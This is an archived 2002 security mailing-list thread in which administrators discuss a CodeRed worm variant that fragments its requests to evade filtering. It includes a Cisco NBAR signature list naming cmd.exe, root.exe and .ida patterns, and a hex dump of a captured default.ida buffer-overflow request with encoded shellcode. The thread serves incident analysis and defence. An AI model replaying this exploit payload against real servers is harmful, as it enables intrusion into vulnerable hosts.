Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

RE: new codered worm penetrates content-filtering

From: "Robert Gile @Agoura" <Robert.Gile () jdpa com>
Date: Thu, 10 Jan 2002 11:06:18 -0800
Are you using Cisco's NBAR to block CodeRed packets? We have two routers,
one 3640 that brings in our two WAN circuits and a 7120 that NAT's and some
other stuff to our Corporate network. I have the NBAR running on both with
the following:

 

  class-map match-any http-hacks
  match protocol http url "*default.ida*"
  match protocol http url "*x.ida*"
  match protocol http url "*.ida*"
  match protocol http url "*cmd.exe*"
  match protocol http url "*root.exe*"
  match protocol http url "*.eml"
 
as per Cisco's website. I shouldn't see any of the packets matching the
CodeRed signatures getting through the first router. But I do. I see packets
showing up in the log on the second router as well. So I am not sure if the
solution that Cisco provided to us is actually working. I am seeing this in
the logs:

 *Mar 22 23:19:47: %SEC-6-IPACCESSLOGP: list (ACCESS-LIST NAME) denied tcp
(SOURCE IP)(26764) -> (DEST IP)(80), 1 packet

*Mar 22 23:19:52: %SEC-6-IPACCESSLOGP: list (ACCESS-LIST NAME) denied tcp
(SOURCE IP)(26764) -> (DEST IP)(80), 1 packet

*Mar 22 23:19:57: %SEC-6-IPACCESSLOGP: list (ACCESS-LIST NAME) denied tcp
(SOURCE IP)(26764) -> (DEST IP)(80), 1 packet

*Mar 22 23:20:19: %SEC-6-IPACCESSLOGP: list (ACCESS-LIST NAME) denied tcp
(SOURCE IP)(26764) -> (DEST IP)(80), 1 packet

*Mar 22 23:20:26: %SEC-6-IPACCESSLOGP: list (ACCESS-LIST NAME) denied tcp
(SOURCE IP)(26843) -> (DEST IP)(80), 1 packet

*Mar 22 23:20:30: %SEC-6-IPACCESSLOGP: list (ACCESS-LIST NAME) denied tcp
(SOURCE IP)(26843) -> (DEST IP)(80), 1 packet

*Mar 22 23:20:36: %SEC-6-IPACCESSLOGP: list (ACCESS-LIST NAME) denied tcp
(SOURCE IP)(26843) -> (DEST IP)(80), 1 packet

*Mar 22 23:21:53: %SEC-6-IPACCESSLOGP: list (ACCESS-LIST NAME) denied tcp
(SOURCE IP)(26843) -> (DEST IP)(80), 1 packet

 

 

 


-----Original Message-----
From: Chris Russel [mailto:russel () yorku ca] 
Sent: Thursday, January 10, 2002 10:19 AM
To: incidents () securityfocus com
Subject: Re: new codered worm penetrates content-filtering

For those who asked, here's a sample of the GET request packets.  With
normal codered (and any other web traffic) the GET would be in the same
packet as the URL since there is no reason to fragment.
Ironically, the Don't Fragment bit is set...

08:05:00.285196 a.b.c.d.3237 > w.x.y.z.80: P 1:5(4) ack 1 win 16384 (DF)
payload:
0030                    47 45  54 20 00 00                     GE T ..

08:05:00.289638 a.b.c.d.3237 > w.x.y.z.80: P 5:513(508) ack 1 win 16384 (DF)
payload:
0030                    2f 64  65 66 61 75 6c 74 2e 69         /d efault.i
0040  64 61 3f 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   da?NNNNN NNNNNNNN
0050  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
0060  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
0070  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
0080  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
0090  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
00a0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
00b0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
00c0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
00d0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
00e0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
00f0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
0100  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
0110  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
0120  4e 4e 4e 25 75 39 30 39  30 25 75 36 38 35 38 25   NNN%u909 0%u6858%
0130  75 63 62 64 33 25 75 37  38 30 31 25 75 39 30 39   ucbd3%u7 801%u909
0140  30 25 75 36 38 35 38 25  75 63 62 64 33 25 75 37   0%u6858% ucbd3%u7
0150  38 30 31 25 75 39 30 39  30 25 75 36 38 35 38 25   801%u909 0%u6858%
0160  75 63 62 64 33 25 75 37  38 30 31 25 75 39 30 39   ucbd3%u7 801%u909
0170  30 25 75 39 30 39 30 25  75 38 31 39 30 25 75 30   0%u9090% u8190%u0
0180  30 63 33 25 75 30 30 30  33 25 75 38 62 30 30 25   0c3%u000 3%u8b00%
0190  75 35 33 31 62 25 75 35  33 66 66 25 75 30 30 37   u531b%u5 3ff%u007
01a0  38 25 75 30 30 30 30 25  75 30 30 3d 61 20 20 48   8%u0000% u00=a  H
01b0  54 54 50 2f 31 2e 30 0d  0a 43 6f 6e 74 65 6e 74   TTP/1.0. .Content
01c0  2d 74 79 70 65 3a 20 74  65 78 74 2f 78 6d 6c 0a   -type: t ext/xml.
01d0  48 4f 53 54 3a 77 77 77  2e 77 6f 72 6d 2e 63 6f   HOST:www .worm.co
01e0  6d 0a 20 41 63 63 65 70  74 3a 20 2a 2f 2a 0a 43   m. Accep t: */*.C
01f0  6f 6e 74 65 6e 74 2d 6c  65 6e 67 74 68 3a 20 33   ontent-l ength: 3
0200  35 36 39 20 0d 0a 0d 0a  55 8b ec 81 ec 18 02 00   569 .... U.......
0210  00 53 56 57 8d bd e8 fd  ff ff b9 86 00 00 00 b8   .SVW.... ........
0220  cc cc cc cc f3 ab c7 85  70 fe ff ff 00 00 00 00   ........ p.......
0230  e9 0a                                              ..

-- 
Chris Russel     | CNS Information Security
russel () yorku ca  | York University, Toronto, Canada




----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: